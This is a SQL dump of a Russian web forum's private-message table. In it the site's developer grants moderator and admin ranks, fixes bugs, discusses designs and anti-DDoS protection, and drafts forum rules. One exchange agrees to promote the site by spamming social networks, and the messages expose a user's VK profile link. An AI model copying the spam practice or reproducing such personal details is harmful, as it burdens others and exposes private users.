INSERT INTO letters VALUES("39","1","6","где то накосячил)","1420284127","1","i","0","");
INSERT INTO letters VALUES("40","6","1","где то накосячил)","1420284127","1","o","0","");
INSERT INTO letters VALUES("41","6","1","НУ ВЫХОДИТ ЧТО ТАК","1420284164","1","i","0","");
INSERT INTO letters VALUES("42","1","6","НУ ВЫХОДИТ ЧТО ТАК","1420284164","1","o","0","");
INSERT INTO letters VALUES("43","1","6","сейчас поправлю, функцию вставить забыл","1420284251","1","i","0","");
INSERT INTO letters VALUES("25","6","1","ну с верху сообщения события","1420283463","1","i","0","");
INSERT INTO letters VALUES("26","1","6","ну с верху сообщения события","1420283463","1","o","0","");
INSERT INTO letters VALUES("27","6","1","ну не сразу заметно что +1","1420283733","1","i","0","");
INSERT INTO letters VALUES("28","1","6","ну не сразу заметно что +1","1420283733","1","o","0","");
INSERT INTO letters VALUES("29","1","6","Окей, бропоробуй кош заполнить","1420283756","1","i","0","");
INSERT INTO letters VALUES("30","6","1","Окей, бропоробуй кош заполнить","1420283756","1","o","0","");
INSERT INTO letters VALUES("31","1","6","попробуй кош заполнить!","1420283771","1","i","0","");
INSERT INTO letters VALUES("32","6","1","попробуй кош заполнить!","1420283771","1","o","0","");
INSERT INTO letters VALUES("44","6","1","сейчас поправлю, функцию вставить забыл","1420284251","1","o","0","");
INSERT INTO letters VALUES("45","6","1","ок<br />","1420284424","1","i","0","");
INSERT INTO letters VALUES("46","1","6","ок<br />","1420284424","1","o","0","");
INSERT INTO letters VALUES("47","1","6","а теперь?","1420284446","1","i","0","");
INSERT INTO letters VALUES("48","6","1","а теперь?","1420284446","1","o","0","");
INSERT INTO letters VALUES("49","6","1","Настройки сохранены *упорот*","1420284475","1","i","0","");
INSERT INTO letters VALUES("50","1","6","Настройки сохранены *упорот*","1420284475","1","o","0","");
INSERT INTO letters VALUES("51","1","6","))","1420284503","1","i","0","");
INSERT INTO letters VALUES("52","6","1","))","1420284503","1","o","0","");
INSERT INTO letters VALUES("53","1","6","сейчас подтверждение сделаю))","1420284535","1","i","0","");
INSERT INTO letters VALUES("54","6","1","сейчас подтверждение сделаю))","1420284535","1","o","0","");
INSERT INTO letters VALUES("55","6","1","ок","1420285281","1","i","0","");
INSERT INTO letters VALUES("56","1","6","ок","1420285281","1","o","0","");
INSERT INTO letters VALUES("57","6","1","Пиши","1420292504","1","i","0","");
INSERT INTO letters VALUES("58","1","6","Пиши","1420292504","1","o","0","");
INSERT INTO letters VALUES("59","1","6","Окей :)","1420292548","1","i","0","");
INSERT INTO letters VALUES("60","6","1","Окей :)","1420292548","1","o","0","");
INSERT INTO letters VALUES("61","6","1","БРО В АСЮ ЗАЙДИ","1420296457","1","i","0","");
INSERT INTO letters VALUES("62","1","6","БРО В АСЮ ЗАЙДИ","1420296457","1","o","0","");
INSERT INTO letters VALUES("63","1","6","окей","1420296750","1","i","0","");
INSERT INTO letters VALUES("64","6","1","окей","1420296750","1","o","0","");
INSERT INTO letters VALUES("65","0","1","<b>Abuse от Senusert на Veteran:</b> вот так. <b>В диалоге было:</b> Реклама сторонних ресурсов","1420296868","1","o","0","");
INSERT INTO letters VALUES("66","6","1","Скрин","1420297183","1","i","0","mail/file_652066.png");
INSERT INTO letters VALUES("67","1","6","Скрин","1420297183","1","o","0","mail/file_652066.png");
INSERT INTO letters VALUES("68","6","1","Как успехи бро:?","1420388813","1","i","0","");
INSERT INTO letters VALUES("69","1","6","Как успехи бро:?","1420388813","1","o","0","");
INSERT INTO letters VALUES("70","1","6","норм :) доску позора делаю :)","1420391987","1","i","0","");
INSERT INTO letters VALUES("71","6","1","норм :) доску позора делаю :)","1420391987","1","o","0","");
INSERT INTO letters VALUES("72","7","1","Привет Гг","1420401598","1","i","0","");
INSERT INTO letters VALUES("73","1","7","Привет Гг","1420401598","1","o","0","");
INSERT INTO letters VALUES("74","1","7","ку)","1420403153","1","i","0","");
INSERT INTO letters VALUES("75","7","1","ку)","1420403153","1","o","0","");
INSERT INTO letters VALUES("76","7","1","<span style=\"color: #FF0000;\"><b>[censored]</b></span>меня мучает один вопрос…","1420403635","1","i","0","");
INSERT INTO letters VALUES("77","1","7","<span style=\"color: #FF0000;\"><b>[censored]</b></span>меня мучает один вопрос…","1420403635","1","o","0","");
INSERT INTO letters VALUES("78","1","7","какой? :)","1420403757","1","i","0","");
INSERT INTO letters VALUES("79","7","1","какой? :)","1420403757","1","o","0","");
INSERT INTO letters VALUES("80","7","1","а че с сообщениями? Не полностью отправляются Гг Вопрос, что делать с bycss? Не подскажешь?","1420403838","1","i","0","");
INSERT INTO letters VALUES("81","1","7","а че с сообщениями? Не полностью отправляются Гг Вопрос, что делать с bycss? Не подскажешь?","1420403838","1","o","0","");
INSERT INTO letters VALUES("82","1","7","мат скрывается Гг а что с bycss?","1420406585","1","i","0","");
INSERT INTO letters VALUES("83","7","1","мат скрывается Гг а что с bycss?","1420406585","1","o","0","");
INSERT INTO letters VALUES("84","7","1","Да блин, времени вообще нету чтобы им заниматься, вот думаю, мб продать","1420407977","1","i","0","");
INSERT INTO letters VALUES("85","1","7","Да блин, времени вообще нету чтобы им заниматься, вот думаю, мб продать","1420407977","1","o","0","");
INSERT INTO letters VALUES("86","1","7","это только тебе решать ; (","1420438707","1","i","0","");
INSERT INTO letters VALUES("87","7","1","это только тебе решать ; (","1420438707","1","o","0","");
INSERT INTO letters VALUES("88","6","1","Отлично!ну мне все нравится!","1420443422","1","i","0","");
INSERT INTO letters VALUES("89","1","6","Отлично!ну мне все нравится!","1420443422","1","o","0","");
INSERT INTO letters VALUES("90","6","1","ааа вот че еще!с моего тела диз мелкий совсем ничерта не видно","1420443463","1","i","0","");
INSERT INTO letters VALUES("91","1","6","ааа вот че еще!с моего тела диз мелкий совсем ничерта не видно","1420443463","1","o","0","");
INSERT INTO letters VALUES("92","1","6","бро, не модерируй ни кого","1420466163","1","i","0","");
INSERT INTO letters VALUES("93","6","1","бро, не модерируй ни кого","1420466163","1","o","0","");
INSERT INTO letters VALUES("94","6","1","окей понял!","1420466775","1","i","0","");
INSERT INTO letters VALUES("95","1","6","окей понял!","1420466775","1","o","0","");
INSERT INTO letters VALUES("96","0","6","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user5\">Asadal</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=6\">плюс</a>!","1420972978","1","i","0","");
INSERT INTO letters VALUES("97","0","5","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user6\">Veteran</a><span style=\"color: green;\"> [Адм]</span> поставил Вам <a href=\"avtoritet.php?do=history&nk=5\">плюс</a>!","1420974695","0","i","0","");
INSERT INTO letters VALUES("98","0","6","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Пользователь] !","1422525939","1","i","0","");
INSERT INTO letters VALUES("103","27","1","привет! как увас WMID потвердить?","1426432907","1","i","0","");
INSERT INTO letters VALUES("102","0","21","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Модератор] !","1426432318","1","i","0","");
INSERT INTO letters VALUES("104","1","27","привет! как увас WMID потвердить?","1426432907","1","o","0","");
INSERT INTO letters VALUES("105","1","27","Привет :) Любую сумму на мой кошелёк отправить :) Мой кошелёк в анкете :)","1426433026","1","i","0","");
INSERT INTO letters VALUES("106","27","1","Привет :) Любую сумму на мой кошелёк отправить :) Мой кошелёк в анкете :)","1426433026","1","o","0","");
INSERT INTO letters VALUES("107","27","1","хорошо ток на днях ато уменя 1 копейка на коше! придумай текс рекламы я там в теме написал с меня спам сайта бесплатно","1426433128","1","i","0","");
INSERT INTO letters VALUES("108","1","27","хорошо ток на днях ато уменя 1 копейка на коше! придумай текс рекламы я там в теме написал с меня спам сайта бесплатно","1426433128","1","o","0","");
INSERT INTO letters VALUES("109","1","27","Ок, :) Да текст любой :)","1426433387","1","i","0","");
INSERT INTO letters VALUES("110","27","1","Ок, :) Да текст любой :)","1426433387","1","o","0","");
INSERT INTO letters VALUES("111","0","27","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Модератор] !","1426433404","1","i","0","");
INSERT INTO letters VALUES("112","27","1","хорошо! там почитай я подправил пост на должность мож подайду тебе!","1426433452","1","i","0","");
INSERT INTO letters VALUES("113","1","27","хорошо! там почитай я подправил пост на должность мож подайду тебе!","1426433452","1","o","0","");
INSERT INTO letters VALUES("114","1","27","Выдал модератора :)","1426433591","1","i","0","");
INSERT INTO letters VALUES("115","27","1","Выдал модератора :)","1426433591","1","o","0","");
INSERT INTO letters VALUES("116","27","1","спасибо!","1426433725","1","i","0","");
INSERT INTO letters VALUES("117","1","27","спасибо!","1426433725","1","o","0","");
INSERT INTO letters VALUES("118","1","27","Как сможешь рекламь, и про форум не забывай ;)","1426433757","1","i","0","");
INSERT INTO letters VALUES("119","27","1","Как сможешь рекламь, и про форум не забывай ;)","1426433757","1","o","0","");
INSERT INTO letters VALUES("120","27","1","vbytve.tk в вип блоке кину сайт! спам в соц сетях! хорошо!","1426433847","1","i","0","");
INSERT INTO letters VALUES("121","1","27","vbytve.tk в вип блоке кину сайт! спам в соц сетях! хорошо!","1426433847","1","o","0","");
INSERT INTO letters VALUES("122","1","27","ок :)","1426433936","1","i","0","");
INSERT INTO letters VALUES("123","27","1","ок :)","1426433936","1","o","0","");
INSERT INTO letters VALUES("124","1","27","А это твой сайт?","1426433965","1","i","0","");
INSERT INTO letters VALUES("125","27","1","А это твой сайт?","1426433965","1","o","0","");
INSERT INTO letters VALUES("126","27","1","да! правдо какойто доссер балуется! сейчас ищу защиту!","1426434021","1","i","0","");
INSERT INTO letters VALUES("127","1","27","да! правдо какойто доссер балуется! сейчас ищу защиту!","1426434021","1","o","0","");
INSERT INTO letters VALUES("128","1","27","Сейчас выгружу в зц антиддос :)","1426434058","1","i","0","");
INSERT INTO letters VALUES("129","27","1","Сейчас выгружу в зц антиддос :)","1426434058","1","o","0","");
INSERT INTO letters VALUES("130","27","1","хорошо","1426434107","1","i","0","");
INSERT INTO letters VALUES("131","1","27","хорошо","1426434107","1","o","0","");
INSERT INTO letters VALUES("132","0","30","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Ст.Модератор] !","1426434279","1","i","0","");
INSERT INTO letters VALUES("133","1","36","Ооо, привет :) Какие люди ! :)","1426434373","1","i","0","");
INSERT INTO letters VALUES("134","36","1","Ооо, привет :) Какие люди ! :)","1426434373","1","o","0","");
INSERT INTO letters VALUES("135","27","1","http://vbytve.tk/ гатова","1426434437","1","i","0","");
INSERT INTO letters VALUES("136","1","27","http://vbytve.tk/ гатова","1426434437","1","o","0","");
INSERT INTO letters VALUES("137","36","1","Ку","1426434482","1","i","0","");
INSERT INTO letters VALUES("138","1","36","Ку","1426434482","1","o","0","");
INSERT INTO letters VALUES("139","1","27","хорошо :)","1426434508","1","i","0","");
INSERT INTO letters VALUES("140","27","1","хорошо :)","1426434508","1","o","0","");
INSERT INTO letters VALUES("141","0","36","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Ст.Модератор] !","1426436028","1","i","0","");
INSERT INTO letters VALUES("142","27","1","чет я даже лишний пост в теме немагу удолить там 2 одинаковых написали","1426436047","1","i","0","");
INSERT INTO letters VALUES("143","1","27","чет я даже лишний пост в теме немагу удолить там 2 одинаковых написали","1426436047","1","o","0","");
INSERT INTO letters VALUES("144","0","27","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Ст.Модератор] !","1426436087","1","i","0","");
INSERT INTO letters VALUES("145","1","27","Повысил :)","1426436101","1","i","0","");
INSERT INTO letters VALUES("146","27","1","Повысил :)","1426436101","1","o","0","");
INSERT INTO letters VALUES("147","27","1","ок!","1426436257","1","i","0","");
INSERT INTO letters VALUES("148","1","27","ок!","1426436257","1","o","0","");
INSERT INTO letters VALUES("149","1","36","Выдал пока что старшего модера :)","1426436655","1","i","0","");
INSERT INTO letters VALUES("150","36","1","Выдал пока что старшего модера :)","1426436655","1","o","0","");
INSERT INTO letters VALUES("151","37","1","Я на бумасе ответил :)<br />","1426436914","1","i","0","");
INSERT INTO letters VALUES("152","1","37","Я на бумасе ответил :)<br />","1426436914","1","o","0","");
INSERT INTO letters VALUES("153","1","37","не понял :)","1426437019","1","i","0","");
INSERT INTO letters VALUES("154","37","1","не понял :)","1426437019","1","o","0","");
INSERT INTO letters VALUES("155","36","1","Ладно. Я не жалуюсь","1426437117","1","i","0","");
INSERT INTO letters VALUES("156","1","36","Ладно. Я не жалуюсь","1426437117","1","o","0","");
INSERT INTO letters VALUES("157","21","1","Денис, меня зовут Айден, рад знакомству)<br />Я сейчас немного отдыхаю, после 22:00 начну заполнять форум, думаю сработаемся.<br />Если тут не отвечаю пиши в вк - http://vk.com/ironnheart<br />И да, мвло возможностей модератора на форуме, нету изменить/удалить чужой пост, реализуй<br />Приятного тебе вечера друг)","1426437262","1","i","0","");
INSERT INTO letters VALUES("158","1","21","Денис, меня зовут Айден, рад знакомству)<br />Я сейчас немного отдыхаю, после 22:00 начну заполнять форум, думаю сработаемся.<br />Если тут не отвечаю пиши в вк - http://vk.com/ironnheart<br />И да, мвло возможностей модератора на форуме, нету изменить/удалить чужой пост, реализуй<br />Приятного тебе вечера друг)","1426437262","1","o","0","");
INSERT INTO letters VALUES("159","1","21","Реализуем :) И кстати, выдам тебе повышение :)","1426437325","1","i","0","");
INSERT INTO letters VALUES("160","21","1","Реализуем :) И кстати, выдам тебе повышение :)","1426437325","1","o","0","");
INSERT INTO letters VALUES("161","32","1","Почему файлы грузить не могу в з.ц?","1426437341","1","i","0","");
INSERT INTO letters VALUES("162","1","32","Почему файлы грузить не могу в з.ц?","1426437341","1","o","0","");
INSERT INTO letters VALUES("163","0","21","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Ст.Модератор] !","1426437342","1","i","0","");
INSERT INTO letters VALUES("164","1","32","Всмысле?","1426437370","1","i","0","");
INSERT INTO letters VALUES("165","32","1","Всмысле?","1426437370","1","o","0","");
INSERT INTO letters VALUES("166","1","36","Чуть позже админа выдам :)","1426437409","1","i","0","");
INSERT INTO letters VALUES("167","36","1","Чуть позже админа выдам :)","1426437409","1","o","0","");
INSERT INTO letters VALUES("168","36","1","Окей. Ща иконку для статьи найду Гг","1426437499","1","i","0","");
INSERT INTO letters VALUES("169","1","36","Окей. Ща иконку для статьи найду Гг","1426437499","1","o","0","");
INSERT INTO letters VALUES("170","32","1","Нажимаю загрузить файл, кидает на, сайт/диск/индекс.php","1426437529","1","i","0","");
INSERT INTO letters VALUES("171","1","32","Нажимаю загрузить файл, кидает на, сайт/диск/индекс.php","1426437529","1","o","0","");
INSERT INTO letters VALUES("172","21","1","Благодарю, но не стоило) не заслужил еще)","1426437598","1","i","0","");
INSERT INTO letters VALUES("173","1","21","Благодарю, но не стоило) не заслужил еще)","1426437598","1","o","0","");
INSERT INTO letters VALUES("174","1","32","Сейчас, сек","1426437638","1","i","0","");
INSERT INTO letters VALUES("175","32","1","Сейчас, сек","1426437638","1","o","0","");
INSERT INTO letters VALUES("176","1","21","Эм, так это ещё не последняя должность :)","1426437673","1","i","0","");
INSERT INTO letters VALUES("177","21","1","Эм, так это ещё не последняя должность :)","1426437673","1","o","0","");
INSERT INTO letters VALUES("178","1","36","ок :)","1426437693","1","i","0","");
INSERT INTO letters VALUES("179","36","1","ок :)","1426437693","1","o","0","");
INSERT INTO letters VALUES("180","32","1","ok","1426437708","1","i","0","");
INSERT INTO letters VALUES("181","1","32","ok","1426437708","1","o","0","");
INSERT INTO letters VALUES("182","36","1","Готово. И методу вывел","1426437717","1","i","0","");
INSERT INTO letters VALUES("183","1","36","Готово. И методу вывел","1426437717","1","o","0","");
INSERT INTO letters VALUES("184","0","36","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Администратор] !","1426437755","1","i","0","");
INSERT INTO letters VALUES("185","1","36","Ок :) Повысил, и подтвердил вмид :)","1426437784","1","i","0","");
INSERT INTO letters VALUES("186","36","1","Ок :) Повысил, и подтвердил вмид :)","1426437784","1","o","0","");
INSERT INTO letters VALUES("187","36","1","Спасиб. Буду следить за сайтом","1426437870","1","i","0","");
INSERT INTO letters VALUES("188","1","36","Спасиб. Буду следить за сайтом","1426437870","1","o","0","");
INSERT INTO letters VALUES("189","1","36","ок :) За форум ответственный :) Темки создавай, новости на форуме пиши по тематике, вообщем старайся поддержать активность :) А я модами и рекламой займусь :)","1426437954","1","i","0","");
INSERT INTO letters VALUES("190","36","1","ок :) За форум ответственный :) Темки создавай, новости на форуме пиши по тематике, вообщем старайся поддержать активность :) А я модами и рекламой займусь :)","1426437954","1","o","0","");
INSERT INTO letters VALUES("191","36","1","Лады.","1426438055","1","i","0","");
INSERT INTO letters VALUES("192","1","36","Лады.","1426438055","1","o","0","");
INSERT INTO letters VALUES("193","21","1","Буду стремиться)","1426438063","1","i","0","");
INSERT INTO letters VALUES("194","1","21","Буду стремиться)","1426438063","1","o","0","");
INSERT INTO letters VALUES("195","0","7","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user1\"><span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span></a><span style=\"color: green;\"> [Разр]</span> присвоил Вам уровень [Администратор] !","1426438092","1","i","0","");
INSERT INTO letters VALUES("196","1","21","ок :)","1426438109","1","i","0","");
INSERT INTO letters VALUES("197","21","1","ок :)","1426438109","1","o","0","");
INSERT INTO letters VALUES("198","1","7","Лёх, можешь дизайн на основе этого написать? С теми же дивами, возможно даже просто существующие подправить :)","1426439327","1","i","0","");
INSERT INTO letters VALUES("199","7","1","Лёх, можешь дизайн на основе этого написать? С теми же дивами, возможно даже просто существующие подправить :)","1426439327","1","o","0","");
INSERT INTO letters VALUES("200","7","1","Можен хороший диз залепить?","1426439381","1","i","0","");
INSERT INTO letters VALUES("201","1","7","Можен хороший диз залепить?","1426439381","1","o","0","");
INSERT INTO letters VALUES("202","1","7","оу, стой сек","1426439470","1","i","0","");
INSERT INTO letters VALUES("203","7","1","оу, стой сек","1426439470","1","o","0","");
INSERT INTO letters VALUES("204","7","1","?","1426439510","1","i","0","");
INSERT INTO letters VALUES("205","1","7","?","1426439510","1","o","0","");
INSERT INTO letters VALUES("206","1","7","http://t.cy-pr.com/c/5e/hackbit.net.jpg<br />На подобии тако сможешь? :)","1426439549","1","i","0","");
INSERT INTO letters VALUES("207","7","1","http://t.cy-pr.com/c/5e/hackbit.net.jpg<br />На подобии тако сможешь? :)","1426439549","1","o","0","");
INSERT INTO letters VALUES("208","7","1","Ага. Только мне бы данные от хоста","1426439615","1","i","0","");
INSERT INTO letters VALUES("209","1","7","Ага. Только мне бы данные от хоста","1426439615","1","o","0","");
INSERT INTO letters VALUES("210","39","1","так значит нет ленты ников как на профи?","1426439619","1","i","0","");
INSERT INTO letters VALUES("211","1","39","так значит нет ленты ников как на профи?","1426439619","1","o","0","");
INSERT INTO letters VALUES("212","1","7","Заклёпай пока что шаблон :) Данные потом дам, сейчас с тела просто :)","1426439710","1","i","0","");
INSERT INTO letters VALUES("213","7","1","Заклёпай пока что шаблон :) Данные потом дам, сейчас с тела просто :)","1426439710","1","o","0","");
INSERT INTO letters VALUES("214","1","39","Пока что нет, позже напишу :)","1426439764","1","i","0","");
INSERT INTO letters VALUES("215","39","1","Пока что нет, позже напишу :)","1426439764","1","o","0","");
INSERT INTO letters VALUES("216","7","1","Я сегодня не могу, на работе, завтра приступлю. Я б замутил шаблон, но вижу тут структура сайта сложная, подгонять сложновато будет, лучше сразу на хосте","1426439829","1","i","0","");
INSERT INTO letters VALUES("217","1","7","Я сегодня не могу, на работе, завтра приступлю. Я б замутил шаблон, но вижу тут структура сайта сложная, подгонять сложновато будет, лучше сразу на хосте","1426439829","1","o","0","");
INSERT INTO letters VALUES("218","39","1","измени пожалуйста на nab1r, и когда создаш модуль не добавляй это туда.ок?","1426440028","1","i","0","");
INSERT INTO letters VALUES("219","1","39","измени пожалуйста на nab1r, и когда создаш модуль не добавляй это туда.ок?","1426440028","1","o","0","");
INSERT INTO letters VALUES("220","1","39","ок :)","1426441614","1","i","0","");
INSERT INTO letters VALUES("221","39","1","ок :)","1426441614","1","o","0","");
INSERT INTO letters VALUES("222","39","1","а можно попросить градиент","1426442157","1","i","0","");
INSERT INTO letters VALUES("223","1","39","а можно попросить градиент","1426442157","1","o","0","");
INSERT INTO letters VALUES("224","39","1","спасибо за ник!","1426442180","1","i","0","");
INSERT INTO letters VALUES("225","1","39","спасибо за ник!","1426442180","1","o","0","");
INSERT INTO letters VALUES("226","1","39","Окей :)","1426442181","1","i","0","");
INSERT INTO letters VALUES("227","39","1","Окей :)","1426442181","1","o","0","");
INSERT INTO letters VALUES("228","39","1","что окей?","1426442244","1","i","0","");
INSERT INTO letters VALUES("232","39","1","о боже да ты бог!:D","1426442397","1","i","0","");
INSERT INTO letters VALUES("230","1","7","ок придумаем что нить :)","1426442266","1","i","0","");
INSERT INTO letters VALUES("231","7","1","ок придумаем что нить :)","1426442266","1","o","0","");
INSERT INTO letters VALUES("233","1","39","о боже да ты бог!:D","1426442397","1","o","0","");
INSERT INTO letters VALUES("234","1","39","Да ладно :)","1426442478","1","i","0","");
INSERT INTO letters VALUES("235","39","1","Да ладно :)","1426442478","1","o","0","");
INSERT INTO letters VALUES("236","39","1","да да","1426442509","1","i","0","");
INSERT INTO letters VALUES("237","1","39","да да","1426442509","1","o","0","");
INSERT INTO letters VALUES("238","1","39","Ну делай, я на баланс закинул рубликов :)","1426442548","1","i","0","");
INSERT INTO letters VALUES("239","39","1","Ну делай, я на баланс закинул рубликов :)","1426442548","1","o","0","");
INSERT INTO letters VALUES("240","39","1","ща жди выберу","1426443164","1","i","0","");
INSERT INTO letters VALUES("241","1","39","ща жди выберу","1426443164","1","o","0","");
INSERT INTO letters VALUES("242","7","1",":)","1426443345","1","i","0","");
INSERT INTO letters VALUES("243","1","7",":)","1426443345","1","o","0","");
INSERT INTO letters VALUES("244","1","7","http://profiwm.com/forum/thema63016<br />Вот, апни плиз :)","1426443418","1","i","0","");
INSERT INTO letters VALUES("245","7","1","http://profiwm.com/forum/thema63016<br />Вот, апни плиз :)","1426443418","1","o","0","");
INSERT INTO letters VALUES("246","7","1","В бане до 2032 года","1426443493","1","i","0","");
INSERT INTO letters VALUES("247","1","7","В бане до 2032 года","1426443493","1","o","0","");
INSERT INTO letters VALUES("248","1","7","за что?","1426444103","1","i","0","");
INSERT INTO letters VALUES("249","7","1","за что?","1426444103","1","o","0","");
INSERT INTO letters VALUES("250","7","1","Зарегался, потом кто-то зарегал ник Macmep_leto и меня отправили в бан, типа клон","1426444291","1","i","0","");
INSERT INTO letters VALUES("251","1","7","Зарегался, потом кто-то зарегал ник Macmep_leto и меня отправили в бан, типа клон","1426444291","1","o","0","");
INSERT INTO letters VALUES("252","27","1","антидос не в зип архиве неработает","1426444309","1","i","0","");
INSERT INTO letters VALUES("253","1","27","антидос не в зип архиве неработает","1426444309","1","o","0","");
INSERT INTO letters VALUES("254","1","27","он же в rar","1426444369","1","i","0","");
INSERT INTO letters VALUES("255","27","1","он же в rar","1426444369","1","o","0","");
INSERT INTO letters VALUES("256","27","1","на кео нераспаковывается","1426444533","1","i","0","");
INSERT INTO letters VALUES("257","1","27","на кео нераспаковывается","1426444533","1","o","0","");
INSERT INTO letters VALUES("258","1","27","сейчас перезалью","1426444926","1","i","0","");
INSERT INTO letters VALUES("259","27","1","сейчас перезалью","1426444926","1","o","0","");
INSERT INTO letters VALUES("260","27","1","ок! сматрю нас доссят","1426444988","1","i","0","");
INSERT INTO letters VALUES("261","1","27","ок! сматрю нас доссят","1426444988","1","o","0","");
INSERT INTO letters VALUES("262","1","27","всмысле?","1426445445","1","i","0","");
INSERT INTO letters VALUES("263","27","1","всмысле?","1426445445","1","o","0","");
INSERT INTO letters VALUES("264","27","1","предлогаю добавить правила форума","1426445457","1","i","0","");
INSERT INTO letters VALUES("265","1","27","предлогаю добавить правила форума","1426445457","1","o","0","");
INSERT INTO letters VALUES("266","27","1","несколька раз сайт неработал из за досса","1426445501","1","i","0","");
INSERT INTO letters VALUES("267","1","27","несколька раз сайт неработал из за досса","1426445501","1","o","0","");
INSERT INTO letters VALUES("268","1","27","Насчёт правил, рано пока что :)","1426445574","1","i","0","");
INSERT INTO letters VALUES("269","27","1","Насчёт правил, рано пока что :)","1426445574","1","o","0","");
INSERT INTO letters VALUES("270","27","1","да не парочка непомешалобы","1426445632","1","i","0","");
INSERT INTO letters VALUES("271","1","27","да не парочка непомешалобы","1426445632","1","o","0","");
INSERT INTO letters VALUES("275","0","18","<img src=\"../bugtrack/img/temman.png\"> <a href=\"/user27\">vinkh</a><span style=\"color: green;\"> [Ст.Мод]</span> записал Вам <a href=\"narushenie.php?do=open&nk=18\">Нарушение</a>!","1426445814","0","i","0","");
INSERT INTO letters VALUES("276","27","1","Запрещено оставлять на форуме более 3 однотипных сообщений подряд (Конкурсы исключение). ( Блокировка на 1 ч.)<br />Каждому юзеру форума запрещено писать сообщения, которые не имеют как такового смысла (флуд, оффтоп, спам).<br />( Блокировка на 3 ч.)<br />Запрещено создавать темы не в соответствующих им подфорумах. ( Блокировка на 1 ч.)","1426445918","1","i","0","");
INSERT INTO letters VALUES("273","1","27","например?","1426445706","1","i","0","");
INSERT INTO letters VALUES("274","27","1","например?","1426445706","1","o","0","");
INSERT INTO letters VALUES("277","1","27","Запрещено оставлять на форуме более 3 однотипных сообщений подряд (Конкурсы исключение). ( Блокировка на 1 ч.)<br />Каждому юзеру форума запрещено писать сообщения, которые не имеют как такового смысла (флуд, оффтоп, спам).<br />( Блокировка на 3 ч.)<br />Запрещено создавать темы не в соответствующих им подфорумах. ( Блокировка на 1 ч.)","1426445918","1","o","0","");
INSERT INTO letters VALUES("278","27","1","ну как?","1426446413","1","i","0","");
INSERT INTO letters VALUES("279","1","27","ну как?","1426446413","1","o","0","");
INSERT INTO letters VALUES("280","1","27","Хорошо, взял в обороты :)","1426446465","1","i","0","");
INSERT INTO letters VALUES("281","27","1","Хорошо, взял в обороты :)","1426446465","1","o","0","");
INSERT INTO letters VALUES("282","27","1","окей!","1426446525","1","i","0","");
INSERT INTO letters VALUES("283","1","27","окей!","1426446525","1","o","0","");
INSERT INTO letters VALUES("284","27","1","Набор администрации закончен?","1426446662","1","i","0","");
INSERT INTO letters VALUES("285","1","27","Набор администрации закончен?","1426446662","1","o","0","");
INSERT INTO letters VALUES("286","1","27","Впринципе да, но пусть темка открыта будет","1426446696","1","i","0","");
INSERT INTO letters VALUES("287","27","1","Впринципе да, но пусть темка открыта будет","1426446696","1","o","0","");
